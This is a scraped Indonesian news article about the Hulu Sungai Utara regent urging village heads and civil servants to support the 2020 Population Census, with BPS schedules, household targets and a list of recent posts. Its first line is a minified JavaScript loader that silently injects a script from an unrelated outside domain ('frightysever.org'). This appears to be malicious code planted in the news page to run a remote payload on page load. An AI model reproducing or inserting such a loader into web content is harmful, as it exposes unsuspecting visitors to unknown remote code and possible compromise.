(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Bupati HSU Minta Sukseskan Sensus Penduduk 2020, Kades dan ASN Mesti Beri Contoh


KANALKALIMANTAN.COM, AMUNTAI – Bupati Hulu Sungai Utara (HSU) H Abdul Wahid HK memberikan apresiasi besar terhadap suksesnya Sensus Penduduk 2020.

Hal tersebut diutarakan Bupati Wahid saat menghadiri rapat koordinasi (Rakor) antara Pemkab HSU bersama Badan Pusat Statistik (BPS) HSU di Hotel Balqis Amuntai, Selasa (3/3/2020) kemarin.

Program Sensus Penduduk yang rutin dilaksanakan setiap 10 tahun sekali ini kembali dilaksanakan serentak di seluruh Indonesia. Untuk itu, Pemkab HSU berperan serta mendukung dan ikut berpartisipasi demi menyukseskan Sensus Penduduk Tahun 2020 (SP 2020) melalui rapat koordinasi dengan seluruh jajaran dan instansi terkait.

“Kita juga sama-sama berkomitmen dan berusaha  memberikan dukungan maksimal terhadap dilaksanakannya Sensus Penduduk (SP) tahun 2020 ini, sebagaimana yang diarahkan oleh Presiden Republik Indonesia agar sensus penduduk ini memberikan 1 data untuk Indonesia,” ujar Bupati HSU Abdul Wahid HK saat rakor.

Wahid menyebut, berdasarkan Undang-undang nomor 16 tahun 1997 tentang statistik dan Peraturan Pemerintah nomor 51 tahun 1999 tentang penyelengaraan statistik serta rekomendasi PBB mengenai sensus penduduk perumahan tahun 2020 BPS akan melaksanakan sensus penduduk (SP) tahun 2020.

“Sensus Penduduk (SP) 2020 ini merupakan penyelenggaraan kegiatan pendataan lengkap seluruh penduduk Indonesia yang ketujuh, sejak tahun 1961, bertujuan untuk menyediakan data jumlah, komposisi, persebaran dan karakteristik penduduk Indonesia, sebagai dasar dalam penetapan perencanaan dan kebijakan pemerintah dimasa masa yang akan datang,” jelasnya.

Selain itu, menurut Wahid sensus ini sangat penting karena untuk memberikan data, satu data untuk Indonesia, sebagai objek untuk dasar dalam melakukan kebijakan baik di tingkat nasional, kabupaten hingga ke desa.

“Kita memahami Sensus Penduduk (SP) 2020 ini sangat penting, sehingga peran serta seluruh pihak, merupakan kunci kesuksesan sensus penduduk 2020 ini,” imbuhnya.

Wahid juga mengimbau kepada kepala desa dan para pegawai memperhatikan segala proses kegiatan Sensus Penduduk 2020 ini.

“Saya meminta kepada kepala desa melalui instruksi, melalui koordinasi camat, agar ini menjadi perhatian bersama. Karena pentingnya SP 2020 ini, sangat membutuhkan keterlibatan kita semua, terutama aparatur sipil negara (ASN) yang menjadi contoh teladan bagi masyarakat,” pintanya.

Bupati Hulu Sungai Utara (HSU) H Abdul Wahid HK memberikan apresiasi besar terhadap suksesnya Sensus Penduduk 2020. foto: dew

Bupati Wahid juga menekankan khususnya  PNS agar benar-benar menjadi teladan di tengah masyarakat, jadi jangan sampai terjadi malah PNS yang tidak memberikan data yang tidak akurat ke petugas sensus.

“Kita juga akan menginstruksikan kepada seluruh pimpinan SKPD, pimpinan instansi vertikal, maupun instansi yang ada di daerah untuk memberikan dukungan dalam SP 2020 ini,” pungkasnya.

Sementara itu, Kepala BPS HSU Sukma Handayani mengatakan, tahap awal pelaksanaan sensus dengan metode online sendiri dilakukan 15 Februari sampai dengan 31 Maret 2020.

Setelah dengan cara online, kegiatan sensus dilanjutkan di tahap kedua dengan cara mendatangi langsung wawancara ke rumah warga pada 1-31 Juli 2020.

“Untuk Kabupaten Hulu Sungai Utara (HSU), Kalsel, target pada tahapan Sensus Penduduk Online sebanyak 4.219 keluarga atau 5,97 persen dari estimasi jumlah KK sebanyak 70.674 KK berdasarkan data Disdukcapil HSU,” sebutnya.

Disamping hadir  Bupati HSU, hadir pula dalam rakor tersebut perwakilan Kepala BPS Provinsi Kalsel Nuruddin Zain, Sekda HSU H Muhammad Taufik, Unsur Forkopimda Kabupaten HSU, Wakil Ketua DPRD HSU, serta para kepala desa.(kanalkalimantan.com/dew)

Reporter : dew
Editor : bie

 


Al Ghifari

Recent Posts

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

10 menit ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

23 menit ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

32 menit ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

43 menit ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

46 menit ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

3 jam ago

This website uses cookies.